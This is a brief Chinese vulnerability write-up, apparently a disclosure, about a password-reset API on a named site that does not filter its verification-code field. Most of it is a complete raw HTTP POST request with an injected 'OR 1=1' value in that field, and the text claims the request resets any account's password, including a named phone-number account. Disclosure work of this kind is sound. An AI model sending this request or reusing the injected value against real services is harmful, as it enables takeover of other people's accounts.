这里 找回密码的接口 对于 验证码 没有过滤 那么
POST http://biaoda.tomoon.cn/DigitalFrame HTTP/1.1
APIVersion: 1.0
Action: forgetPassword
Device-Type: MP
UUID: 868048029706082
Charset: UTF-8
Content-Type: application/json
UserID:
SessionID: 191fa4b4-4971-405b-942a-90a076fc78bf
Content-Length: 100
Host: biaoda.tomoon.cn
Connection: Keep-Alive
{"userName":"18518605216","userCode":"1=1 OR 1=1 ","userPassNew":"16D7A4FCA7442DDA3AD93C9A726597E4"}
这样即可重置任意账户的密码,重置为 test1234.
甚至 11111111111 账号也可用这个方法重置。
演示
